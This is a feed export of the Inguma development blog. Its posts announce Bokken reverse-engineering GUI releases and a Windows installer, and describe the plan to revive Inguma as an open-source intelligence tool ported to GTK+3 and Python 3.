tag:blogger.com,1999:blog-83209140186670858502024-03-13T08:43:01.167+01:00Inguma DevelopmentInguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.comBlogger26125tag:blogger.com,1999:blog-8320914018667085850.post-78742585780278600902018-12-03T03:14:00.000+01:002019-07-08T17:23:19.837+02:00Development bi-week: First issue, GTK Accelerators not working.<div style="text-align: justify;">
Nothing particularly exciting to report. Plenty of little things here and there, but I'm still hesitant to do major surgery.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<ul>
<li><b>Gtk.IHateGtkDebugging:</b> I have been fighting <b>for days</b> to make the accelerators in the main menu work from the very first moment, but they only work after you use the main menu <b>once</b> (see <a href="https://github.com/inguma/inguma/issues/1" target="_blank">issue #1</a>). People seem to use any combination of <i>Gtk.AccelGroup</i>, <i>Gtk.Action</i>, <i>Gio.Action</i>, <i>Gtk.UIManager</i> and <i>Gtk.Builder</i> to build their menus and I have been completely unable to get it working in GTK+3, albeit it worked in PyGtk.</li>
<li><b>New data types:</b> I'm trying to add IPv6 as a valid data type and remove all the automatic gather/discover modules that run right after adding it.</li>
</ul>
<div>
I'm starting in a new job, so let's see if I'm able to spend some time in Inguma in the next weeks/months!</div>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-68464336678042932132018-11-15T01:09:00.002+01:002018-11-15T01:09:26.558+01:00Development bi-week: GTK+3 migration, and other small big changes.<div style="text-align: justify;">
Welcome to the first (hopefully of many) updates on Inguma development. I've been heads-down getting again a bit more familiar with the codebase and trying to get a grasp on some of the concepts that I would like to have in an open-source intelligence tool. So far I'd say that it's been a frustrating and also a rewarding experience because I have been able to achieve big things.<br />
<br />
As a side note, I'l say that in the past I never understood very well the Inguma codebase, given its organic growth nature from the console version, and I also was not familiar with many of the security tools that it was trying to emulate or replace. It's very interesting how 6 years of working in demanding computer security roles may change your perspective.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Main highlights</h3>
<div>
<ul>
<li style="text-align: justify;">I can't believe that the migration to GTK+3 is (mostly) complete. I have been patching many files manually after running a script to do the bulk of the conversion, but as I get deeper in the code more minor issues will keep arising.</li>
<li style="text-align: justify;">The code is still Python 2.x only but I'm taking small steps to convert things to an intermediate state where the amount of <span style="font-family: Courier New, Courier, monospace;">print</span>'s and other things like that get reduced and the code uses more abstractions.</li>
<li style="text-align: justify;">External dependencies: I updated xdot.py and IPy, and I removed our local copy of <a href="https://scapy.net/">Scapy</a> from the tree. I'm determined to remove as much old cruft as I can from the local tree, some of it dating more that 9 or 10 years back.</li>
<li style="text-align: justify;">Everything from menus to buttons seems horribly broken but I'm trying to fix things as fast as I can.</li>
<li style="text-align: justify;">I added a new data type called <b>IPv6</b>. It's a first step to understand how difficult is to make a datatype-agnostic KB and interface.</li>
</ul>
<div style="text-align: justify;">
The summary is that Inguma is in a terrible state of flux right now. The code assumes, for example, that you are going to run several if not all "gather" and "discover" modules for every IPv4 or domain that you enter, instead of letting the user trigger it manually.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I added a <a href="https://trello.com/b/KBTfqfGL/inguma" target="_blank">small Trello board</a> with some ideas, so feel free to add issues to <a href="https://github.com/inguma/inguma/issues" target="_blank">Github</a> if you have a particular feature of problem that you want us to tackle first.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thank you for reading!</div>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-50926359087281986162018-10-29T19:42:00.000+01:002018-11-09T20:23:11.112+01:00Future plans for Inguma development<div style="text-align: justify;">
All right. After the revelations two days ago about Inguma visiting us from the grave, the next thing is to make a bucket list of what needs to be done. In a somewhat-ordered list of most to least important, this is what I'd like to accomplish:<br />
<br />
<br />
<ol style="text-align: start;">
<li style="text-align: justify;"><u>Port Inguma to GTK+3 + GObject</u>:</li>
<ul>
<li style="text-align: justify;">Inguma is written in PyGTK + GTK+2, which has ceased development several years ago. GObject is the new introspection from the GTK+ project which allows to allow the usage of language bindings for any library using it without having to rewrite things when the library changes.</li>
<li style="text-align: justify;">This should help us keep an easier install procedure for MacOS and Windows.</li>
</ul>
<li style="text-align: justify;"><u>Port Inguma code to Python 3</u>:</li>
<ul>
<li style="text-align: justify;">While we were not looking, the world has finally moved to Python 3 and things like xdot.py are actually now GTK+3 and Python 3. This is dependent on third-party code living in the tree or external dependencies that are only in Python 2.</li>
</ul>
<li style="text-align: justify;"><u>Remove years-old cruft from the tree</u>:</li>
<ul>
<li style="text-align: justify;">Inguma has accumulated a fair amount of old code (pyew, krash, fuzz, scapy, pyshellcodelib, etc.) that it's either plain old and outdated or that has been getting updates in all this time. Spring cleaning it is!</li>
</ul>
<li style="text-align: justify;"><u>Remove Bokken from Inguma</u>:</li>
<ul>
<li style="text-align: justify;">Sadly, Bokken is not usable now with radare having evolved on its own for a few years now. We will need to revisit that at a later stage.</li>
</ul>
<li style="text-align: justify;"><u>Hide funtionality until it's battle-tested</u>:</li>
<ul>
<li style="text-align: justify;">In the open source world, there's always a debate about whether you should release early and often with incomplete functionality, or shipping only features that work well in a variety of environments and that are not going to crush those testers with very high hopes.</li>
<li style="text-align: justify;">Given that our development time is limited, I prefer to stay with a product that shows only stable features, and instead of removing lots of code that could potentially need to be added later, for now just hide everything else behind a config or runtime flag so we don't confuse new users with broken stuff everywhere.</li>
</ul>
<li style="text-align: justify;"><u>Make documentation great again</u>:</li>
<ul>
<li style="text-align: justify;">We lost the wiki, but even if I'm able to recover it, I'm not sure if a wiki is the best way of keeping documentation updated. I'm thinking about generating it automatically for specific versions so it's easier to change and upload.</li>
</ul>
<li style="text-align: justify;"><u>Make modules...modular</u>:</li>
<ul>
<li style="text-align: justify;">The list of actions that you can make with a graph is very limited and hardcoded in <i>lib/ui/target_dialog.py</i> and <i>lib/ui/graphMenu.py</i> (if I'm not mistaken). In order to make Inguma a proper open-source intelligence client, the list of <i>transforms</i> (borrowing a term from Maltego) has to be extensible and modular, and move away from the actual node-as-IP paradigm.</li>
</ul>
<li style="text-align: justify;"><u>Ignore (or delete) the text-only Inguma client</u>:</li>
<ul>
<li style="text-align: justify;">For those of you who don't know it, Inguma started as a text-only application until Hugo built the UI in PyGTK. Having to maintain both is beyond my expectations at this moment, so if you use it and it goes and eats your grandmother, don't come whining. Take this as my one and only warning.</li>
</ul>
<li style="text-align: justify;"><u>Fix the terminals code</u>:</li>
<ul>
<li style="text-align: justify;">It's broken (or it will be) when anything of the above happens. It was already brittle and it doesn't like to be disturbed, but it's not a priority to really fix it.</li>
</ul>
</ol>
<div>
All the above said, I would like to release a couple of versions in <i>technology-preview</i> mode just to make sure that anyone who wants to test it has a good starting point.</div>
</div>
<ol>
</ol>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-82375432613349952062018-10-24T05:08:00.000+02:002018-11-07T17:43:52.102+01:00Inguma is back, and due team update<div style="text-align: justify;">
As we are approaching Halloween (in the United States, at least) I find quite amusing to announce at this time of the year that Inguma is back from the dead, one more time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you like to know the nitty-gritty details about what happened and where we are going, keep reading. Otherwise:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>TL;DR</b>: The Inguma code is now in <a href="https://github.com/inguma/inguma">Github</a>, and we are pivoting it to become a general purpose OSINT tool.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Still here? Oh, my, you seem to be of the masochistic type. Let me add some history bits about the project as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So...</div>
<div style="text-align: justify;">
</div>
<ul>
<li style="text-align: justify;">The development team (literally these two dummies writing the blog) is still alive. No doubt on that.</li>
<li style="text-align: justify;">We lost the server that hosted inguma.eu, bokken.re and the rest of the domains, the Mercurial repository, the wikis and everything else. We are still in control of DNS and everything but it will take the undersigned (i.e. Ender) some time to come up with a web server, mail server and the rest.</li>
<li style="text-align: justify;">Hugo and I have been very far from each other, and not exactly with a lot of time in our hands. Life changes made things more difficult. Bokken, the only piece of the project that was still moving forward, became obsolete (more on this later).</li>
<li style="text-align: justify;">I was not working as a security professional when I started helping with the project. Since then, many things have changed and I have been working as such for the last 6 years. Needless to say, I see the world in a different way now.</li>
<li style="text-align: justify;">Inguma was a project that Hugo inherited from hacker <i>extraordinaire</i> Joxean Koret, which was console-only, and which Hugo converted into a dual console-PyGTK application. Bokken, a UI around the reversing framework <a href="https://rada.re/">Radare</a>, was then started around 2011 in the same fashion (a PyGTK application) using the radare Python bindings due to radare being console-only. We saw the potential to merge it with Inguma in some way, and Bokken became the reversing engine in Inguma apart from being an standalone application.</li>
<li style="text-align: justify;">Somewhere in 2015 the Radare team expressed that they would like to use Qt and Hugo remade Bokken in a matter of weeks in C++ and Qt as a new project called <a href="https://github.com/hteso/iaito">iaito</a>. Some time later, the Radare team decided to stop using it and they adopted it into their Github repos as <a href="https://github.com/radareorg/cutter">Cutter</a>.</li>
<li style="text-align: justify;">At the same time, Inguma hadn't seen a commit since 2012. We were very focused on making Bokken a success, and working in a codebase that was as disorganized (due to its long, organic growth) as Inguma was a barrier. I wanted to add an HTTP server, proper modules, unit tests, move it to GTK+3, and many other things, but ended up putting only half of the work needed for every one of those things. A true love-hate relationship.</li>
<li style="text-align: justify;">At the same time, Hugo had started using Inguma as the base for several personal modified versions with airplane modules for his talks about airplane security (after all, he's a recognized world expert on that field). He was using it mostly as a pen-testing framework and was reasonably happy with it.</li>
<li style="text-align: justify;">So fast forward, and we then lost the server with everything.</li>
</ul>
<div>
<div style="text-align: justify;">
And then, several weeks ago, I started to look for free software replacement for <a href="https://www.maltego.com/clients.html">Maltego</a>, the Open Source Intelligence program. And do you know what?</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<b>There's none.</b></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
I thought of using my experience with Inguma and Bokken to write something simple in GTK+3. After a couple of tries, I dug into my hard drives and I found my Inguma checkouts. I realized that I had pretty much everything I needed: a modern UI, most of the heavy work that an interface needs, and a graph engine based on Graphviz. I could just reuse some of the parts.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Long story short, I talked to Hugo and, while he seemed a bit reluctant at first, I managed to get him excited about reviving Inguma and converting it into something... different.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So that’s it. I’m dropping a lot of the old cruft in Inguma that has been outdated since 2012 or before, bringing it up to speed regarding modern codebases, removing (for now) some of the exploiting/terminals/reconnaissance UI, and adding a lot of features to be able to work as a OSINT manager.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
See you out there. It’s going to be great. </div>
</div>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-80155081916809744832015-08-21T10:48:00.000+02:002015-08-21T10:48:56.467+02:00Windows installer!This is a small blog post for a big announcement, at least if you are a Windows user! We know that installing Bokken is not the easiest task, mainly if you use the Microsoft's platform; but that has just changed with the arrival of the new Bokken Windows installer!<br />
<br />
Thanks to the excellent job of <a href="https://github.com/HardcoreHacker">HardcoreHacker</a> now installing Bokken in Windows is this easy: just <a href="http://www.bokken.re/download.html" target="_blank">download</a> the new installer and it will take care of everything:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw-f2Sdie2aVZ-XSFzgbwPQOkb5QhAvufrsA7PLkMqdeMQ580be1qpYhn_bK8OArMfjfyYm7yQGSLjE8TdBJW736C77usv_noHsg5FFVp5sXl2KACOrPfDwEuka0HNx3DzH2VVagumSuNR/s1600/Bokken_installer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw-f2Sdie2aVZ-XSFzgbwPQOkb5QhAvufrsA7PLkMqdeMQ580be1qpYhn_bK8OArMfjfyYm7yQGSLjE8TdBJW736C77usv_noHsg5FFVp5sXl2KACOrPfDwEuka0HNx3DzH2VVagumSuNR/s1600/Bokken_installer.PNG" /></a></div>
<br />
<br />
<div style="text-align: justify;">
The installer will also take care of Bokken's dependencies and will ask you to install Python and PyGtk in case it's needed. And that's all, folks, Bokken successfully installed!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0sXJDXTOzviJS6n_zuoVqAHdL-XfLVee6_3DocO3OZrdccfssgbsG-Ioe2-uCpjlolT5qmJn6VhtMxpUWdYjIpvLGKyNkpzMD8LtR7YDXONXYL6_eewzxk6n13cLIQhTdmh4zKOVFFe6H/s1600/Bokken_installer_end.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0sXJDXTOzviJS6n_zuoVqAHdL-XfLVee6_3DocO3OZrdccfssgbsG-Ioe2-uCpjlolT5qmJn6VhtMxpUWdYjIpvLGKyNkpzMD8LtR7YDXONXYL6_eewzxk6n13cLIQhTdmh4zKOVFFe6H/s1600/Bokken_installer_end.PNG" /></a></div>
<br />
<br />
Just a few clicks and Bokken's icon will be on your desktop waiting for you to launch it!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTydyYf8oy3EziCNPSV59Bh22oBbIJFs5eQGjcTgWGjqHNE7FjXVSL7wS2Wal3vWQmZ_nopmu44IkbfO6sG6HSleZyAQaoF3vL1zGfiu9kVj_LdXAb3yqEdlxN7E7a33O5e0vU7rOGLbnR/s1600/Bokken_windows.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTydyYf8oy3EziCNPSV59Bh22oBbIJFs5eQGjcTgWGjqHNE7FjXVSL7wS2Wal3vWQmZ_nopmu44IkbfO6sG6HSleZyAQaoF3vL1zGfiu9kVj_LdXAb3yqEdlxN7E7a33O5e0vU7rOGLbnR/s400/Bokken_windows.PNG" width="400" /></a></div>
<br />
<br />
The installer has been tested in the following Windows versions:<br />
<div>
<ul>
<li>Windows XP x86</li>
<li>Windows 7 x86_64</li>
<li>Windows 10 x86_64</li>
</ul>
</div>
If you encounter any problem, just <a href="http://www.bokken.re/contact.html" target="_blank">let us know</a> and we will fix it as soon as possible.<br />
<br />
Now just go, <a href="http://www.bokken.re/download.html" target="_blank">download</a> Bokken and enjoy it in your favorite platform!htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com4tag:blogger.com,1999:blog-8320914018667085850.post-68432394995997200832015-06-10T09:49:00.000+02:002015-06-10T09:49:38.964+02:00Bokken 1.8It has been just one month and we are back with a new release of Bokken, 1.8 is here! This release was meant to be a minor one, with just support for the latest radare2 version but... look at it by yourself:<br />
<h3>
</h3>
<h3>
Bye, bye, pyew</h3>
Bokken started as a UI for pyew and radare2, and we tried hard to maintain both backends in our development. Sadly, pyew moves very slowly and has a different set of skills than radare, so although it's a tough move, we decided to strip down all pyew functionality from Bokken altogether. Given that there's nothing else in the OSS world that fulfills this niche, we will be tied to r2 for a while. Maybe it's for the best, as the deletion allowed us to clean <b>a lot</b> of old cruft and compatibility code that has been in Bokken for ages.<br />
<br />
<h3>
radare2 0.9.9</h3>
As always, if a new radare2 version is released then we update Bokken to work with it! Bokken 1.8 works perfectly with (and <b><span style="color: orange;">ONLY with</span></b>) radare2 0.9.9.<br />
<br />
<h3>
Sections tab</h3>
In an effort to better organize the UI we have moved the Sections information to a new tab in the right panels. More work will be done for future releases to make it better.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSvznpUyskvsIUzV_mtpRr-H3e8q24CqqAnNwnNJwmte3QIp-6wObjA7ZCh8kgNelNUAs4LpzixLJ7LtC63YoVdAtV4dJZBbSsCzM7dRcjDVu9Tu8oS4ivnVubG1FrtgFOGmshkDeg71b/s1600/sections_tab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSvznpUyskvsIUzV_mtpRr-H3e8q24CqqAnNwnNJwmte3QIp-6wObjA7ZCh8kgNelNUAs4LpzixLJ7LtC63YoVdAtV4dJZBbSsCzM7dRcjDVu9Tu8oS4ivnVubG1FrtgFOGmshkDeg71b/s640/sections_tab.png" width="640" /></a></div>
<br />
<h3>
Simplified file info tab</h3>
<div>
Most of the contents of the File Info tab were duplicated and, being honest, useless. So we have decided to remove most of the contents, leave only the useful ones and present them in a better way.</div>
<div>
<br />
<h3>
</h3>
<h3>
Removed string repr tab</h3>
<div>
Time has arrived to say goodbye to this useless tab. Farewell!</div>
<div>
<br />
<h3>
New relocs side panel</h3>
</div>
<div>
After moving the Sections panel to the right we decided to use the space for a new and very useful panel: Relocs!</div>
<br />
<h3>
New strings tab</h3>
</div>
<div>
The Strings tab has gone under a complete remake and now it looks better and is easier to use.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU4HqcCpgMTS5YWZe0gKyvvaZxpUw647m0lSfJqWrjCjORGjBqz4i0t4Cl3ZL5m8eIXIQWlGSwat96KRcfbTd6F4Qv_0ynW574RpUFrkpHWawAGSgfqUHRgnlPXw4E-KMxzV9xkhKJBK8s/s1600/Strings_relocs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU4HqcCpgMTS5YWZe0gKyvvaZxpUw647m0lSfJqWrjCjORGjBqz4i0t4Cl3ZL5m8eIXIQWlGSwat96KRcfbTd6F4Qv_0ynW574RpUFrkpHWawAGSgfqUHRgnlPXw4E-KMxzV9xkhKJBK8s/s640/Strings_relocs.png" width="640" /></a></div>
<br />
<h3>
New radare2 console</h3>
</div>
<div>
If you look at the above picture, you may spot an area in the lower section of the UI. Say goodbye to the Interactive tab and welcome the brand new radare2 console! Way easier to use that the previous one, you can find it as a new bottom panel that can be resized and hidden.</div>
<div>
<br /></div>
<h3>
New Python console</h3>
<div>
There is more: Python! Either love it or hate it, but we finally added a Python console to Bokken! Located in the new bottom panel it exports Bokken and radare2 objects such as the radare2 RCore instance, RBin and most of the data gathered by Bokken. Expect some tutorials as we polish that feature.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJbMJSbYQVyo9bN6N0_SuAU4dVhWPCF6Rmp-xzAoarVvXFVaCa7aTdFshF14WLw75L4J7H_9adtgGyONxvudxho5h1PSug8MRi1yuNAjdRqsxaWBFQhf4Tvz3KyUJ37M3paz_sXIrq7R2w/s1600/Python_file_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJbMJSbYQVyo9bN6N0_SuAU4dVhWPCF6Rmp-xzAoarVvXFVaCa7aTdFshF14WLw75L4J7H_9adtgGyONxvudxho5h1PSug8MRi1yuNAjdRqsxaWBFQhf4Tvz3KyUJ37M3paz_sXIrq7R2w/s640/Python_file_info.png" width="640" /></a></div>
<br />
<br />
<h2 style="text-align: center;">
<b><a href="http://bokken.re/download.html">Download Bokken 1.8 today!</a></b></h2>
htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-74816773382862693582015-05-05T12:40:00.000+02:002015-06-03T22:29:35.785+02:00Welcome Bokken 1.7Yes, we know, it has been a very long time since the last release and most of you thought that the project was dead. I am happy to be able to say that it was not dead, just taking a long nap. And now we are back and with a new Bokken release!<br />
<br />
Bokken 1.7 is here and though it is not a major release it still has some nice new features and improvements; let's see them, shall we?<br />
<br />
<h3>
radare2 0.9.8</h3>
<br />
Bokken 1.7 has been updated to work with the latest <a href="http://rada.re/" target="_blank">radare2</a> stable release, (<a href="http://radare.today/radare-0-9-8/" target="_blank">0.9.8</a>) and it benefits from all the improvements and stabilization that is offered by that great software.<br />
<br />
That was one of the most demanded features and we are happy to finally have Bokken running smoothly with the last radare2. We will do our best to keep supporting the latest releases!<br />
<br />
<h3>
Improved graphs</h3>
<br />
The graphs have been improved in both functionality and appearance. They now work better and look really nice! Did you notice the small graph preview on the lower right corner?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4rgxGlxu8IdlazOfMwyaCe6NFyLeLdTUwchxTLc04U_suSYqMWe2SmVbQDvRrIfasxfyiMV3UAU_8Kuf2LfmKbQbzslZ6Ckxo3QDvQah3Gajf_J3caY4l_xt2NpaPd_fRlxypP0l7v3U/s1600/graph_view_xrefs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="329" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4rgxGlxu8IdlazOfMwyaCe6NFyLeLdTUwchxTLc04U_suSYqMWe2SmVbQDvRrIfasxfyiMV3UAU_8Kuf2LfmKbQbzslZ6Ckxo3QDvQah3Gajf_J3caY4l_xt2NpaPd_fRlxypP0l7v3U/s1600/graph_view_xrefs.png" width="640" /></a></div>
<br />
<br />
<h3>
Word highlight</h3>
<br />
This new feature make it easy to follow the code by highlighting all the words like the one the cursor is placed on. Useful to, for example, find all the <i>"call"</i> in a function or follow that register that contains important data!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZ1qhwgcZc4nov_y9_iu1ea14fTc3pYB_QGntAhGaYke_fwu9FxdTabMr2wQqOpEK9lv2XXX_c43FsENkhlFN4JO1EtAN6ZD13hi9paOCIskzbEApKZcik09xSJvUWSNy9By70H_JEN6E/s1600/code_view_dark_seek.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZ1qhwgcZc4nov_y9_iu1ea14fTc3pYB_QGntAhGaYke_fwu9FxdTabMr2wQqOpEK9lv2XXX_c43FsENkhlFN4JO1EtAN6ZD13hi9paOCIskzbEApKZcik09xSJvUWSNy9By70H_JEN6E/s1600/code_view_dark_seek.png" width="640" /></a></div>
<br />
<br />
<h3>
ARM support</h3>
<br />
Although Bokken can open and analyze any format supported by radare2, interactivity and syntax highlighting now also works with ARM binaries! We will keep adding more in future releases; any preference? Let us know!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7epSr2I1Yz1OvO2kMmCAiRqxte0gpF0LQmCnSCjQSXdO_qOd8t7uwzRt3jHehUZqz8IwGUh2jmJi58DnuBpW_wLQxxxJq9mok7U1ZBLdVElC9NJO5AEmFbqqxbhbAISsiNuWIKkzcz_g/s1600/bokken-arm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7epSr2I1Yz1OvO2kMmCAiRqxte0gpF0LQmCnSCjQSXdO_qOd8t7uwzRt3jHehUZqz8IwGUh2jmJi58DnuBpW_wLQxxxJq9mok7U1ZBLdVElC9NJO5AEmFbqqxbhbAISsiNuWIKkzcz_g/s1600/bokken-arm.png" width="640" /></a></div>
<br />
<br />
<h3>
Bindiff fixed and improved</h3>
<br />
Working better than ever and with more visual enhancements, Bokken's binary diffing is now way better!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbnNX9y7hyQIBMIXDOnj-hzNKKN4E8I1h-QAO10rGbMJQJxokSG9WXWHyC2zYRlE_STNLFpEQZ51YqoT1VdVHO6wPc06sAQlhfytazsA50jNz1l_ug-8V4sH2rRLKH3r6qAj1l-3Cy1Dr/s1600/bindiff_graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbnNX9y7hyQIBMIXDOnj-hzNKKN4E8I1h-QAO10rGbMJQJxokSG9WXWHyC2zYRlE_STNLFpEQZ51YqoT1VdVHO6wPc06sAQlhfytazsA50jNz1l_ug-8V4sH2rRLKH3r6qAj1l-3Cy1Dr/s1600/bindiff_graph.png" width="640" /></a></div>
<br />
<br />
<h3>
More analysis options</h3>
<br />
This new release supports more binary analysis options offered by radare2, so in the initial dialog it is now possible to choose... well, better look at them by yourself! Can you spot the new ones? ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDluvTGHSyJgQ-CZ-vKJFBxm9kP-r_riG763uI11U1oLDb_AFlxz3IDokmNTOYH0xAe-asMBd70wcAwJf0E6UOKG1paBsDx79xtZsV6tOS6QL6kzcNxTRwlLTHKX0NciR7n4Aywsgy3Au/s1600/options_dialog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDluvTGHSyJgQ-CZ-vKJFBxm9kP-r_riG763uI11U1oLDb_AFlxz3IDokmNTOYH0xAe-asMBd70wcAwJf0E6UOKG1paBsDx79xtZsV6tOS6QL6kzcNxTRwlLTHKX0NciR7n4Aywsgy3Au/s1600/options_dialog.png" width="223" /></a></div>
<br />
<br />
<h3>
Tooltips!</h3>
<br />
Tooltips everywhere! Place the mouse over an address, function or symbol and a tooltip will popup with a brief disassembly. But not just that, same functionality can be found in the functions list on the left panel, no need to move to a function to take a quick look.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CdwKRyJ9JAhR3TyPeYDY3tyPSu-xeM2kUZlH6llhCQkr15A2OkrWDnz2KnBko4heVMIJyOjl_axEhyWalmJO9MhGJIRq_WHIDA6vUAEB4NRA2CmgBpqLEGV2YeT6Avxt2BjxxTy111qm/s1600/code_view_tooltip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CdwKRyJ9JAhR3TyPeYDY3tyPSu-xeM2kUZlH6llhCQkr15A2OkrWDnz2KnBko4heVMIJyOjl_axEhyWalmJO9MhGJIRq_WHIDA6vUAEB4NRA2CmgBpqLEGV2YeT6Avxt2BjxxTy111qm/s1600/code_view_tooltip.png" width="640" /></a></div>
<br />
<br />
<h3>
Download and enjoy</h3>
<br />
Not bad for a minor release, right? Good, because that's not all, we still have one last thing:<br />
<br />
<div style="text-align: center;">
<b><span style="color: #3d85c6; font-size: large;">A brand new project domain and website!</span></b></div>
<br />
No screenshot this time! If you want to view it then go to the <a href="http://bokken.re/" target="_blank">new website</a> and further explore the new release. We hope that you decide to download and try it by yourself.<br />
<br />
If you feel in the mood, go by the development site and give us <a href="http://bokken.re/contact.html" target="_blank">feedback</a> to further improve Bokken. And don't forget to follow the project in <a href="https://twitter.com/ingumito" target="_blank">Twitter</a> to get all the project news.<br />
<br />
Happy reversing!<br />
<br />
<br />
<br />
<br />
<br />htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-30639335476248815682014-01-01T11:13:00.000+01:002014-01-01T11:18:03.000+01:00Debian radare2 0.9.6 published and broken Bokken.<div style="text-align: justify;">
I have just published the radare2 0.9.6 packages for Debian in the Inguma Debian repository (<a href="http://deb.inguma.eu/">http://deb.inguma.eu</a>). They are in their way to the official archives, but due to several new packages, it will take them a while to reach unstable as they have to go through the FTPmasters' manual approval.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have been using radare2 0.9 as the base API in Bokken (it was the latest packaged), for the past two years, and this new release breaks the internal r2 API in several ways, so Bokken is not able to load a single binary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Over the course of the next few days I will be adapting the code to talk to radare again and to force specific versions of the API to make sure this is a less likely event.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
See you in mercurial!</div>
Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-27181429976146457762012-04-20T11:46:00.000+02:002012-04-20T11:46:17.401+02:00Moving towards Inguma 0.5<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It's been quite a long time since our last update so let me show you what has been going on these last weeks.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
<span style="font-size: large;">
Inguma 0.5</span></h4>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the <a href="http://ingumadev.blogspot.com.es/2012/01/bokken-16-is-more-stable-and-easier-to.html" target="_blank">last Bokken release</a> we have focused on Inguma 0.5 development and now I'm going to show you some of the new features we have been working on.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We've done some <b>GUI improvements</b> in order to make it simpler, cleaner and to integrate the last Bokken release:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
